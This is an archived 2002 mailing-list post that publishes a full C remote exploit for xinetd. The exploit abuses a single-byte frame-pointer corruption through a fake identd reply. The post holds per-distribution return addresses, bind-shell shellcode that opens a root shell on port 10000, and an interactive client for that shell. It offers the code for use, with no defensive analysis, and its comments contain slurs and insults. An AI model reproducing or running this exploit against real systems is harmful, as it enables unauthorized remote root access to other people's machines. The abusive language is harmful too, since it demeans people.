| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <200211290751.gAT7p5pS059127@mailserver2.hushmail.com>
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - xinetd exploit
-----BEGIN PGP SIGNED MESSAGE-----
Dear List,
Please enjoy this exploit.
# cat Esxinetd-xp.c
/*
* +++++++++++++++++++++++++++++++++++++++++++++++++
* [ElectronicSouls] - xinetd Exploit - 2k1
* by BrainStorm
* *************************************************
* The code uses a single-byte corruption of the fp.
* sc_addr_pos is the position, from the beginning
* of the writable area, where a pointer to the nop
* will be placed.
* original code by quitest1 - thx :)
* thx to zen-parse, cuz found this sweet bug
* *************************************************
* Greetings: 0x7f - XOR Team - IC - raza-mexicana
* +++++++++++++++++++++++++++++++++++++++++++++++++
*
* Well i stop working on thisone, you can add
* new targets in under 1 minute ..so ;)
* have fun auditing ..oo00oo poor kiddies what now??
* n0 k-r4d x1n3td 0d4y w4r3z *bo0oho0o* - lmfao
*
* STILL - KEEP THIS PRIVATE !! - bs 10.2k1
* addition 2002
* oh well this _test_ code got leaked
* and those ppl edited the banner so it looked like
* i ripped it =/ fuck j00 !@# i just used it as base
* of my research and it was never ment to go public !
* so sorry to www.digit-labs.org !
* and fucks again to those lame code wh0rez who even trade
* unfinished code or research code :P faggots
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netdb.h>
#define MY_PORT 1
#define THEIR_PORT 23
#define IDENTD_PORT 113
#define FIRST_PAD 1009
struct targ
{
int def;
char *descr;
unsigned long int retaddr;
int sc_addr_pos;
};
struct targ target[]=
{
{0, "- Red Hat 6.2 - xinetd-2.1.8.9pre11-1 ", 0xbffff44b, 985},
{1, "- [Test] Halloween 7.0 - xinetd-2.1.8.9pre10 ", 0xbffff39a, 985},
{2, "- RedHat 6.2 (Zoot) - xinetd 1.14(1) rpm ", 0xbfffb038, 985},
{3, "- SuSe 6.4 - xinetd 1.14(1) rpm ", 0xbffff45b, 985},
{4, "- [Test] Value 4 - xinetd-2.1.8.x? ", 0xbffff3d8, 985},
{5, "- [Test] Value 5 - xinetd-2.1.8.x? ", 0xbffff43b, 985},
{69, NULL, 0}
};
char shellcode[] = /* Bindshell at port 10000 */
"\x31\xc0" // xor eax, eax
"\x31\xdb" // xor ebx, ebx
"\x89\xe5" // mov ebp, esp
"\x99" // cdq
"\xb0\x66" // mov al, 102
"\x89\x5d\xfc" // mov [ebp-4], ebx
"\x43" // inc ebx
"\x89\x5d\xf8" // mov [ebp-8], ebx
"\x43" // inc ebx
"\x89\x5d\xf4" // mov [ebp-12], ebx
"\x4b" // dec ebx
"\x8d\x4d\xf4" // lea ecx, [ebp-12]
"\xcd\x80" // int 80h
"\x89\x45\xf4" // mov [ebp-12], eax
"\x43" // inc ebx
"\x66\x89\x5d\xec" // mov [ebp-20], bx
"\x66\xc7\x45\xee\x27\x10" // mov [ebp-18], word 4135
"\x89\x55\xf0" // mov [ebp-16], edx
"\x8d\x45\xec" // lea eax, [ebp-20]
"\x89\x45\xf8" // mov [ebp-8], eax
"\xc6\x45\xfc\x10" // mov [ebp-4], byte 16
"\xb2\x66" // mov dl, 102
"\x89\xd0" // mov eax, ed
"\x8d\x4d\xf4" // lea ecx, [ebp-12]
"\xcd\x80" // int 80h
"\x89\xd0" // mov eax, edx
"\xb3\x04" // mov bl, 4
"\xcd\x80" // int 80h
"\x43" // inc ebx
"\x89\xd0" // mov eax, edx
"\x99" // cdq
"\x89\x55\xf8" // mov [ebp-8], edx
"\x89\x55\xfc" // mov [ebp-4], edx
"\xcd\x80" // int 80h
"\x31\xc9" // xor ecx, ecx
"\x89\xc3" // mov ebx, eax
"\xb1\x03" // mov cl, 3
"\xb0\x3f" // mov al, 63
"\x49" // dec ecx
"\xcd\x80" // int 80h
"\x41" // inc ecx
"\xe2\xf8" // loop -7
"\x52" // push edx
"\x68\x6e\x2f\x73\x68" // push dword 68732f6eh
"\x68\x2f\x2f\x62\x69" // push dword 69622f2fh
"\x89\xe3" // mov ebx, esp
"\x52" // push edx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\xb0\x0b" // mov al, 11
"\xcd\x80"; // int 80h
char zbuf[1024], host[512];
int sel = 0, offset = 0;
int sockami2(char *host, int my_port, int their_port);
void fake_identd(void);
void xp_buf(void);
static void keep_clz(void) __attribute__ ((destructor));
void shellami(int sock);
void usage(char *progname);
int
main(int argc, char **argv)
{
int sock, cnt;
printf("\n\n [ E l e c t r o n i c S o u l s ] \n");
printf("\n Xinetd Exploit by BrainStorm \n\n");
if(getuid())
{
fprintf(stderr, "j00 have to be rewt f00l...\n");
exit(1);
}
if(argc == 1)
usage(argv[0]);
host[0] = 0;
while((cnt = getopt(argc,argv,"h:t:o:s:")) != EOF)
{
switch(cnt)
{
case 'h':
strncpy(host, optarg, sizeof(host));
host[sizeof(host)] = '\x00';
break;
case 't':
sel = atoi(optarg);
break;
case 'o':
offset = atoi(optarg);
break;
case 's':
target[sel].sc_addr_pos = atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}
if(host[0] == 0)
usage(argv[0]);
printf("[!] Host: %s\n as: %s\n", host, target[sel].descr);
target[sel].retaddr += offset;
printf("[!] Using: retaddr = %p \n");
printf("[!] sc_addr_pos = %d...\n");
printf("[*] ok\n", target[sel].retaddr, target[sel].sc_addr_pos);
printf("[!] Starting fake_identd...\n");
fake_identd();
return;
}
int
sockami2(char *host, int my_port, int their_port)
{
struct sockaddr_in address;
struct sockaddr_in my_addr;
struct hostent *hp;
int sock;
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock == -1)
{
perror("socket()");
exit(-1);
}
hp = gethostbyname(host);
if(hp == NULL)
{
perror("gethostbyname()");
exit(-1);
}
my_addr.sin_family = AF_INET;
my_addr.sin_port = htons(my_port);
my_addr.sin_addr.s_addr = INADDR_ANY;
bzero(&(my_addr.sin_zero), 8);
if(bind(sock, (struct sockaddr *)&my_addr,
sizeof(struct sockaddr)) == -1)
{
perror("bind()");
exit(1);
}
memset(&address, 0, sizeof(address));
memcpy((char *) &address.sin_addr, hp->h_addr, hp->h_length);
address.sin_family = AF_INET;
address.sin_port = htons(their_port);
if(connect(sock, (struct sockaddr *) &address,
sizeof(address)) == -1)
{
perror("connect()");
exit(-1);
}
return(sock);
}
void
fake_identd(void)
{
int sockfd, new_fd, sin_size, rem_port, loc_port, i;
char rbuf[1024], sbuf[1024], cif[6], *ptr;
struct sockaddr_in my_addr;
struct sockaddr_in their_addr;
printf("[*] fake_identd forking into background\n");
if (!fork())
{
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket()");
exit(1);
}
my_addr.sin_family = AF_INET;
my_addr.sin_port = htons(IDENTD_PORT);
my_addr.sin_addr.s_addr = INADDR_ANY;
bzero(&(my_addr.sin_zero), 8);
if(bind(sockfd, (struct sockaddr *)&my_addr,
sizeof(struct sockaddr)) == -1)
{
perror("bind()");
exit(1);
}
if(listen(sockfd, 1) == -1)
{
perror("listen()");
exit(1);
}
while(1)
{
sin_size = sizeof(struct sockaddr_in);
if((new_fd = accept(sockfd, (struct sockaddr *)&their_addr,
&sin_size)) == -1)
{
perror("accept()");
continue;
}
memset(rbuf, 0, sizeof(rbuf));
recv(new_fd, rbuf, sizeof(rbuf), 0);
ptr = rbuf; i = 0;
while(*ptr != ',')
{
cif[i] = *ptr;
*ptr++; i ++;
}
sscanf(cif, "%d", &rem_port);
memset(cif, 0, sizeof(cif));
*ptr++; i = 0;
while(*ptr != ' ')
{
cif[i] = *ptr;
*ptr++; i++;
}
sscanf(cif, "%d", &loc_port);
xp_buf();
memset(sbuf, 0, sizeof(sbuf));
sprintf(sbuf, "%d,%d:USERID:%s\r\n",
rem_port, loc_port, zbuf);
send(new_fd, sbuf, strlen(sbuf), 0);
memset(rbuf, 0, sizeof(rbuf));
recv(new_fd, rbuf, sizeof(rbuf), 0);
}
}
return;
}
void
xp_buf(void)
{
int i, n = 0;
memset(zbuf, 0, sizeof(zbuf));
for(i = 0; i < FIRST_PAD; i++)
zbuf[i] = '\x69';
memset(zbuf, 0x90, target[sel].sc_addr_pos - 1);
for(i = target[sel].sc_addr_pos - strlen(shellcode);
i < target[sel].sc_addr_pos;
i++)
zbuf[i] = shellcode[n++];
zbuf[target[sel].sc_addr_pos + 0] = (u_char) (target[sel].retaddr & 0x000000ff);
zbuf[target[sel].sc_addr_pos + 1] = (u_char)((target[sel].retaddr & 0x0000ff00) >> 8);
zbuf[target[sel].sc_addr_pos + 2] = (u_char)((target[sel].retaddr & 0x00ff0000) >> 16);
zbuf[target[sel].sc_addr_pos + 3] = (u_char)((target[sel].retaddr & 0xff000000) >> 24);
return;
}
void
keep_clz(void)
{
int sock;
if(host[0] != 0)
{
printf("[!] Causing an auth request to our fake_identd\n");
sock = sockami2(host, MY_PORT, THEIR_PORT);
printf("[*] Done!\n");
close(sock);
printf("[!@#] enjoy the flash ;> ...\n\n");
sleep(1);
sock = sockami2(host, 10000, 10000);
shellami(sock);
}
}
void
shellami(int sock)
{
int n;
char recvbuf[1024], *cmd = "id; uname -a\n";
fd_set rset;
send(sock, cmd, strlen(cmd), 0);
while (1)
{
FD_ZERO(&rset);
FD_SET(sock, &rset);
FD_SET(STDIN_FILENO, &rset);
select(sock+1, &rset, NULL, NULL, NULL);
if(FD_ISSET(sock, &rset))
{
n = read(sock, recvbuf, 1024);
if (n <= 0)
{
printf("[x] Connection closed by foreign host.\n");
exit(0);
}
recvbuf[n] = 0;
printf("%s", recvbuf);
}
if (FD_ISSET(STDIN_FILENO, &rset))
{
n = read(STDIN_FILENO, recvbuf, 1024);
if (n > 0)
{
recvbuf[n] = 0;
write(sock, recvbuf, n);
}
}
}
return;
}
void
usage(char *progname)
{
int i = 0;
printf("[*] Usage: %s -[h/t/o/s]\n", progname);
printf("[*] Options:\n"
"[-] -h Hostname\n"
"[-] -t Type\n"
"[-] -o Offset\n"
"[-] -s sc_addr_pos\n\n"
"[*] Available types:\n\n");
while(target[i].def != 69)
{
printf(" %d) %s\n", target[i].def, target[i].descr);
i++;
}
exit(1);
}
#
The Electronic Souls Crew
[ElectronicSouls] (c) 2002
"Nothing beats Rice Crispies."
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify
wlMEARECABMFAj3nHHcMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltssEAnRRYNLFGk5+v
5q0xSYJg+Xzhta9xAJ9uYpUkZ9vWirIvEE5bLivyTXoOng==
=XUtq
-----END PGP SIGNATURE-----
Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2
Big $$$ to be made with the HushMail Affiliate Program:
https://www.hushmail.com/about.php?subloc=affiliate&l=427
Powered by blists - more mailing lists